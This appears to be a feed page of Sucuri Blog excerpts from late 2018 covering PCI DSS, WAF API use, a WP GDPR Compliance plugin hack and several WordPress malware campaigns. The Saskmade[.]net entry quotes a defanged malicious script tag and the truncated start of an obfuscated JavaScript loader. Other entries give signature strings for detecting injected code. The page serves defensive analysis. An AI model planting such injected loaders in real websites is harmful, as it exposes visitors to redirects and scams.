Web Security

  • PCI for SMB: Requirement 9 – Implement Strong Access Control Measures (16 November 2018)

    Welcome to the sixth post of a series on understanding the Payment Card Industry Data Security Standard (PCI DSS). We want to show how PCI DSS affects anyone going through the compliance process using the PCI SAQs (Self-Assessment Questionnaires).

    In the previous articles written about PCI, we covered the following:

    • Requirement 1: Build and Maintain a Secure Network – Install and maintain a firewall configuration to protect cardholder data.
    • Requirement 2: Build and Maintain a Secure Network – Do not use vendor-supplied defaults for system passwords or other security parameters.

    Continue reading PCI for SMB: Requirement 9 – Implement Strong Access Control Measures at Sucuri Blog.

  • Real-Time Fine-Tuning of the WAF via API (14 November 2018)

    Though the Sucuri Firewall is simple to set up and protects your website immediately, it’s possible to have granular control of the WAF by using an API.

    For instance, there’s a specific filter inside the WAF dashboard called Emergency DDoS. This filter basically increases the strength of the DDoS protection to an “emergency” level where most non-human access is blocked.

    API to Boost Firewall Protection

    The Firewall API is mostly used for whitelisting and clearing the website cache.

    Continue reading Real-Time Fine-Tuning of the WAF via API at Sucuri Blog.

  • Hackers Change WordPress Siteurl to Pastebin (13 November 2018)

    Last Friday, we reported on a hack that used a vulnerability in the popular WP GDPR Compliance plugin to change WordPress siteurl settings to erealitatea[.]net. At that time it was not clear who was behind the massive attack, since the erealitatea[.]net domain didn’t work and the infection simply broke the compromised sites. Our SiteCheck scanner detected the infection on about 700 sites over the weekend, and PublicWWW currently returns 573 results.

    Continue reading Hackers Change WordPress Siteurl to Pastebin at Sucuri Blog.

  • Erealitatea[.]net Hack Corrupts Websites with WP GDPR Compliance Plugin Vulnerability (10 November 2018)

    We have noticed a growing number of WordPress-based sites that have had their URL settings changed to hxxp://erealitatea[.]net. Further investigations show that the issue is related to a security vulnerability in the WP GDPR Compliance plugin for WordPress (with 100,000+ active installations).

    The new General Data Protection Regulation (GDPR) laws in the EU have made the plugin extremely popular. Many sites are looking for an easy way to comply with these new laws.

    Continue reading Erealitatea[.]net Hack Corrupts Websites with WP GDPR Compliance Plugin Vulnerability at Sucuri Blog.

  • 10 Tips to Improve Your Website Security (7 November 2018)

    Having a website has become easier than ever due to the proliferation of great tools and services in the web development space. Content management systems (CMSs) like WordPress, Joomla!, Drupal, Magento, and others allow business owners to build an online presence rapidly. These CMSs’ highly extensible architectures, rich plugins, and effective modules have reduced the need to spend years learning web development before starting to build a website.

    The ease of launching an online business or personal website is great.

    Continue reading 10 Tips to Improve Your Website Security at Sucuri Blog.

  • New WordPress Security Email Course (5 November 2018)

    Recent statistics show that over 32% of website administrators across the web use WordPress.

    Unfortunately, the CMS’s popularity comes at a price: attackers often seek out vulnerabilities to exploit and target unhardened WordPress sites. If a site is compromised, it often becomes the host of malware or spam campaigns, harming your website’s reputation and visitors in the process.

    Knowledge is power, and we’re here to help! We’ve created a new WordPress Security Email Course to help improve your website’s security posture and reduce the risk of a security incident.

    Continue reading New WordPress Security Email Course at Sucuri Blog.

  • Website Security Tips for Marketers (31 October 2018)

    In our previous post, we discussed why marketers should take a proactive approach to website security. Today we are going to discuss some security tips marketers can put into practice. In the simplest terms, website security means three things here at Sucuri:

    • Protecting your website from compromises.
    • Monitoring for issues so you can react quickly.
    • Having a documented emergency response plan.

    Marketers should champion these initiatives so they can be prioritized by their business development team.

    Continue reading Website Security Tips for Marketers at Sucuri Blog.

  • Web Marketers Should Learn Security (29 October 2018)

    Most online marketers think of themselves as T-shaped individuals. The theory behind this concept is that individuals possess a wide range of skills, with some abilities running deeper than others.

    Website security awareness is in short supply and we need more champions — especially among small and medium-sized businesses. Digital marketers are in a prime position to add security know-how to their diverse toolkit.

    Source: The T-Shaped Web Marketer by Rand Fishkin

    It makes sense for marketers to want to secure their websites.

    Continue reading Web Marketers Should Learn Security at Sucuri Blog.

  • Saskmade[.]net Redirects (26 October 2018)

    Earlier this week, we published a blog post about an ongoing massive malware campaign describing multiple infection vectors that it uses. This same week, we started detecting new modifications of the scripts injected by this attack.

    The general idea of the malware is the same, but the domain name and obfuscation have changed slightly.

    For example, in the wp_posts table they now inject this script:

    <script src='hxxps://saskmade[.]net/head.js?ver=2.0.0' type='text/javascript'></script>

    In the <head> section of HTML and PHP files, and at the top of jQuery-related JavaScript files, they inject this new obfuscated script:

    var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,
    ...skipped...

    Continue reading Saskmade[.]net Redirects at Sucuri Blog.

  • OWASP Top 10 Security Risks – Part II (25 October 2018)

    It is National Cyber Security Awareness Month, and to raise awareness of what threatens the integrity of websites, we have started a series of posts on the OWASP Top 10 security risks.

    The OWASP Top 10 list consists of the 10 most seen application vulnerabilities:

    1. Injection
    2. Broken Authentication
    3. Sensitive Data Exposure
    4. XML External Entities (XXE)
    5. Broken Access Control
    6. Security Misconfigurations
    7. Cross-Site Scripting (XSS)
    8. Insecure Deserialization
    9. Using Components with Known Vulnerabilities
    10. Insufficient Logging and Monitoring

    In our previous post, we explained the first two items on the OWASP Top 10 list: injection and broken authentication.

    Continue reading OWASP Top 10 Security Risks – Part II at Sucuri Blog.

  • Multiple Ways to Inject the Same Tech Support Scam Malware (23 October 2018)

    Last month, we shared information about yet another series of ongoing massive infections using multiple different vectors to inject malicious scripts into WordPress websites.

    Shortly after, the campaign changed the domain names used in its scripts. Now it mainly uses hotopponents[.]site and learningtoolkit[.]club.

    At the time of this writing, PublicWWW finds the most common patterns of this malware on thousands of sites:

    • “var _0xfcc4=” – 8501 sites
    • “hotopponents.site/site.js” – 3636 sites

    Database Injections

    Multiple variations of the injected scripts have been found.

    Continue reading Multiple Ways to Inject the Same Tech Support Scam Malware at Sucuri Blog.